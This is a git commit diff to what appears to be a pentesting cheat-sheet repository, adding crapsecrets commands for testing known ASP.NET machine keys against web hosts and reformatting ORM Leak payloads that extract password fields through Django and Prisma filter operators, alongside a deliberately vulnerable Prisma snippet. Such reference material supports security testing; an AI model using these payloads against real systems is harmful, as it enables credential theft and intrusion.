ORM leak lint + crapsecret

swisskyrepo · swisskyrepo · commit bd72827e5898 · 2026-01-02T19:46:23.000+01:00
diff --git a/API Key Leaks/IIS-Machine-Keys.md b/API Key Leaks/IIS-Machine-Keys.md
@@ -92,6 +92,16 @@ Try multiple machine keys from known products, Microsoft documentation, or other
     validationKey: C50B3C89CB21F4F1422FF158A5B42D0E8DB8CB5CDA1742572A487D9401E3400267682B202B746511891C1BAF47F8D25C07F6C39A104696DB51F17C529AD3CABE validationAlgo: SHA1
     ```
 
+* [irsdl/crapsecrets](https://github.com/irsdl/crapsecrets)
+
+    ```ps1
+    python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r
+    python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5
+    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/
+    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://192.168.6.22:8080/
+    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://192.168.6.22:8080/a1/b/c1/
+    ```
+
 * [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
 
     ```powershell
diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md
@@ -13,14 +13,15 @@
 
 ## Tools
 
-- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets
-- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms
-- [d0ge/sign-saboteur](https://github.com/d0ge/sign-saboteur) - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens
+- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets.
+- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms.
+- [irsdl/crapsecrets](https://github.com/irsdl/crapsecrets) - A library for detecting known secrets across many web frameworks.
+- [d0ge/sign-saboteur](https://github.com/d0ge/sign-saboteur) - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens.
 - [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
-- [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web
-- [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
-- [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place
-- [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints
+- [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web.
+- [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
+- [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place.
+- [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints.
 
     ```powershell
     nuclei -t token-spray/ -var token=token_list.txt
diff --git a/ORM Leak/README.md b/ORM Leak/README.md
@@ -36,8 +36,8 @@ The ORM provides operators for matching parts of a value. These operators can ut
 
 ```json
 {
-    "username": "admin",
-    "password__startswith": "p"
+  "username": "admin",
+  "password__startswith": "p"
 }
 ```
 
@@ -63,7 +63,7 @@ Filtering through user that created an article, and having a password containing
 
 ```json
 {
-    "created_by__user__password__contains": "p"
+  "created_by__user__password__contains": "p"
 }
 ```
 
@@ -79,8 +79,8 @@ Use multiple filters in the same request:
 
 ```json
 {
-    "created_by__departments__employees__user__username__startswith": "p",
-    "created_by__departments__employees__user__id": 1
+  "created_by__departments__employees__user__username__startswith": "p",
+  "created_by__departments__employees__user__id": 1
 }
 ```
 
@@ -118,35 +118,35 @@ Example of an ORM leak in Node.JS with Prisma.
 
 ```js
 const posts = await prisma.article.findMany({
-    where: req.query.filter as any // Vulnerable to ORM Leaks
+  where: req.query.filter as any // Vulnerable to ORM Leaks
 })
 ```
 
 Use the include to return all the fields of user records that have created an article
 
 ```json
 {
-    "filter": {
-        "include": {
-            "createdBy": true
-        }
+  "filter": {
+    "include": {
+      "createdBy": true
     }
+  }
 }
 ```
 
 Select only one field
 
 ```json
 {
-    "filter": {
+  "filter": {
+    "select": {
+      "createdBy": {
         "select": {
-            "createdBy": {
-                "select": {
-                    "password": true
-                }
-            }
+          "password": true
         }
+      }
     }
+  }
 }
 ```
 
@@ -160,37 +160,37 @@ Select only one field
 
 ```json
 {
-    "query": {
-        "createdBy": {
-            "departments": {
+  "query": {
+    "createdBy": {
+      "departments": {
+        "some": {
+          "employees": {
+            "some": {
+              "departments": {
                 "some": {
-                    "employees": {
+                  "employees": {
+                    "some": {
+                      "departments": {
                         "some": {
-                            "departments": {
-                                "some": {
-                                    "employees": {
-                                        "some": {
-                                            "departments": {
-                                                "some": {
-                                                    "employees": {
-                                                        "some": {
-                                                            "{fieldToLeak}": {
-                                                                "startsWith": "{testStartsWith}"
-                                                            }
-                                                        }
-                                                    }
-                                                }
-                                            }
-                                        }
-                                    }
-                                }
+                          "employees": {
+                            "some": {
+                              "{fieldToLeak}": {
+                                "startsWith": "{testStartsWith}"
+                              }
                             }
+                          }
                         }
+                      }
                     }
+                  }
                 }
+              }
             }
+          }
         }
+      }
     }
+  }
 }
 ```
 
@@ -227,6 +227,7 @@ Only in Ransack < `4.0.0`.
 
 * [ORM Injection - HackTricks - July 30, 2024](https://book.hacktricks.xyz/pentesting-web/orm-injection)
 * [ORM Leak Exploitation Against SQLite - Louis Nyffenegger - July 30, 2024](https://pentesterlab.com/blog/orm-leak-with-sqlite3)
+* [ORM Leaking More Than You Joined For - Alex Brown - December 18, 2025](https://www.elttam.com/blog/leaking-more-than-you-joined-for/)
 * [plORMbing your Django ORM - Alex Brown - June 24, 2024](https://www.elttam.com/blog/plormbing-your-django-orm/)
 * [plORMbing your Prisma ORM with Time-based Attacks - Alex Brown - July 9, 2024](https://www.elttam.com/blog/plorming-your-primsa-orm/)
 * [QuerySet API reference - Django - August 8, 2024](https://docs.djangoproject.com/en/5.1/ref/models/querysets/)
diff --git a/SAML Injection/README.md b/SAML Injection/README.md
@@ -17,6 +17,7 @@
 ## Tools
 
 * [CompassSecurity/SAMLRaider](https://github.com/SAMLRaider/SAMLRaider) - SAML2 Burp Extension.
+* [d0ge/XSW](https://github.com/d0ge/XSW) - XML Signature Wrapping Burp Suite Extensions.
 * [ZAP Addon/SAML Support](https://www.zaproxy.org/docs/desktop/addons/saml-support/) - Allows to detect, show, edit, and fuzz SAML requests.
 
 ## Methodology
